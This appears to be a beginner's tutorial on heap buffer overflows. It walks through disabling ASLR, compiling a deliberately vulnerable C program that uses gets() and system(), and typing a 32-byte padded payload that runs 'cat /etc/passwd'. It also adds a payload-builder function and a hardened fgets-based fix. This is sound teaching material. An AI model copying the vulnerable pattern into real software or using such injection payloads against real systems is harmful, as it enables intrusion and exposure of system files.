My First BoF

A very old guide I found on one of my HDDs.

Creating your first buffer overflow

In a 32-bit Kali installation, open a terminal, run the following command and set the file's contents to 0:

sudo nano /proc/sys/kernel/randomize_va_space

This turns off ASLR (address space layout randomisation) for the whole system until the next reboot; the same setting is the kernel.randomize_va_space sysctl, whose normal default is 2. ASLR is a mitigation that makes memory-corruption bugs harder to exploit by randomising where the stack, heap and shared libraries land on every run. It does not stop the overflow itself, and strictly speaking this exploit only depends on the distance between two neighbouring heap chunks, which ASLR does not change. With it off, though, the addresses the program prints are the same on every run, which makes the arithmetic below easier to follow.

Next type

nano overflow.c

and paste the following vulnerable code into the editor.

#define _GNU_SOURCE                 /* newer glibc only declares gets() with this (or -std=gnu99) */
#include <stdio.h>
#include <stdlib.h>                 /* malloc, system */

int main(void) {
    char *name;
    char *dangerous_system_command;
    name = (char *) malloc(10);                      /* 10-byte heap buffer for the name */
    dangerous_system_command = (char *) malloc(128); /* heap buffer for the command, allocated right after it */
    printf("Address of name is %p\n", (void *) name);
    printf("Address of command is %p\n", (void *) dangerous_system_command);
    sprintf(dangerous_system_command, "echo %s", "hello world!");
    printf("whats your name?");
    gets(name);                                      /* unbounded read into a 10-byte buffer: the bug */
    system(dangerous_system_command);
    return 0;
}

This C program creates two variables, name and dangerous_system_command, and allocates a heap buffer for each with malloc: 10 bytes for the name and 128 for the command. The next two print statements show where each buffer sits in memory. The program then fills the command buffer with "echo hello world!" and asks for your name, reading it with gets. gets has no idea how big name is: it copies everything up to the newline, however long, so nothing stops the input from running past the end of the buffer. If the input fits, system runs the prepared command and the program prints "hello world!". Let's do this now.

Compile it and run it:

gcc overflow.c -o overflow

./overflow

gcc warns that gets is dangerous and should not be used; that warning is exactly the bug we are about to exploit. Look at the two printed addresses and subtract them: the difference is the distance from the start of name to the start of the command buffer, in other words how many bytes you can type before you start overwriting the command. malloc rounds small requests up to a whole chunk, so the gap is bigger than the 10 bytes that were asked for. In the run this guide was written against it was 32 bytes, but read it from your own output rather than assuming it.

If we enter a string longer than 32 characters we get an error from the shell saying that the command "r" cannot be found. The letter "r" was the 33rd character of the input: it landed in the first byte of the command buffer, and the NUL terminator that gets appends after the input turned the command into just "r", which system then handed to /bin/sh.

So we know that name is effectively 32 bytes wide and that everything from byte 33 onwards ends up in the command variable. Rather than crash the program, we can place a command of our own at the end of the overflow: a 32-byte string of padding followed by the command we want run, which system will execute as the user who started the program. Like so:

12345678901234567890123456789012cat /etc/passwd

Type that at the "whats your name?" prompt and the program runs cat /etc/passwd instead of the echo. The padding is counted from the gap you measured above, so adjust it if your addresses differ. The payload must not contain a newline, since that is where gets stops reading, and whatever was left of the original echo command beyond your input is cut off by the NUL that gets appends.
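To make both halves of this concrete, here is an added example that is not part of the original guide: a function that computes the padding from the two printed addresses and builds the payload in general (for any gap, not just 32), and a hardened replacement for the gets() call that reads the name with fgets into a bounded buffer so nothing can spill into the neighbouring allocation. The function names and the example command are mine, and the addresses it works from are whatever malloc hands back at run time.

```c
#define _POSIX_C_SOURCE 200809L   /* POSIX 2008 profile; also covers fmemopen() if you feed read_name_safe() an in-memory string */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Distance from the start of the name buffer to the start of the command
 * buffer, taken from the addresses the vulnerable program prints so the
 * padding is measured rather than guessed.  Returns 0 if the command
 * buffer does not lie after the name buffer, i.e. the layout is not the
 * one the attack relies on. */
size_t overflow_gap(uintptr_t name_addr, uintptr_t cmd_addr) {
    if (cmd_addr <= name_addr)
        return 0;
    return (size_t)(cmd_addr - name_addr);
}

/* Build the line to type at the prompt: `gap` filler bytes followed by the
 * command that should replace the prepared echo.  Returns the payload
 * length, or 0 if the layout is wrong or `out` is too small.  Any non-NUL,
 * non-newline filler works, because gets() stops only at a newline. */
size_t build_payload(uintptr_t name_addr, uintptr_t cmd_addr, const char *cmd,
                     char *out, size_t outlen) {
    size_t gap = overflow_gap(name_addr, cmd_addr);
    size_t cmdlen = strlen(cmd);
    if (gap == 0 || gap + cmdlen + 1 > outlen)
        return 0;
    memset(out, 'A', gap);
    memcpy(out + gap, cmd, cmdlen + 1);   /* includes the terminating NUL */
    return gap + cmdlen;
}

/* Hardened replacement for gets(name): reads at most len-1 bytes, strips
 * the newline, and drains the rest of an over-long line so the tail of the
 * attacker's input is not picked up by the next read.  Returns the number
 * of bytes stored in buf. */
size_t read_name_safe(FILE *in, char *buf, size_t len) {
    if (len == 0)
        return 0;
    if (!fgets(buf, (int)len, in)) {
        buf[0] = '\0';
        return 0;
    }
    size_t n = strcspn(buf, "\n");
    if (buf[n] == '\n') {
        buf[n] = '\0';                   /* whole line fitted: drop the newline */
    } else {
        int c;                           /* line was truncated: discard the remainder */
        while ((c = fgetc(in)) != EOF && c != '\n') {
        }
    }
    return n;
}

int main(void) {
    char *name = malloc(10);             /* same two allocations as the original program */
    char *cmd = malloc(128);
    if (!name || !cmd)
        return 1;

    size_t gap = overflow_gap((uintptr_t)name, (uintptr_t)cmd);
    printf("name at %p, command at %p, gap %zu bytes\n", (void *)name, (void *)cmd, gap);

    /* What an attacker would have to type against the gets() version. */
    char payload[256] = {0};
    size_t n = build_payload((uintptr_t)name, (uintptr_t)cmd, "cat /etc/passwd",
                             payload, sizeof payload);
    printf("payload needed against gets(): %zu bytes: %s\n", n, payload);

    /* Hardened version of the original flow: bounded formatting, bounded read. */
    snprintf(cmd, 128, "echo %s", "hello world!");
    printf("whats your name? ");
    fflush(stdout);
    read_name_safe(stdin, name, 10);
    printf("hello %s\n", name);
    system(cmd);                         /* cannot have been overwritten by the name */
    free(name);
    free(cmd);
    return 0;
}
```

Run it and type the payload it prints: the hardened reader keeps only the first 9 characters, the command buffer is untouched, and system still runs the echo. Against the original program the same line runs cat /etc/passwd.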
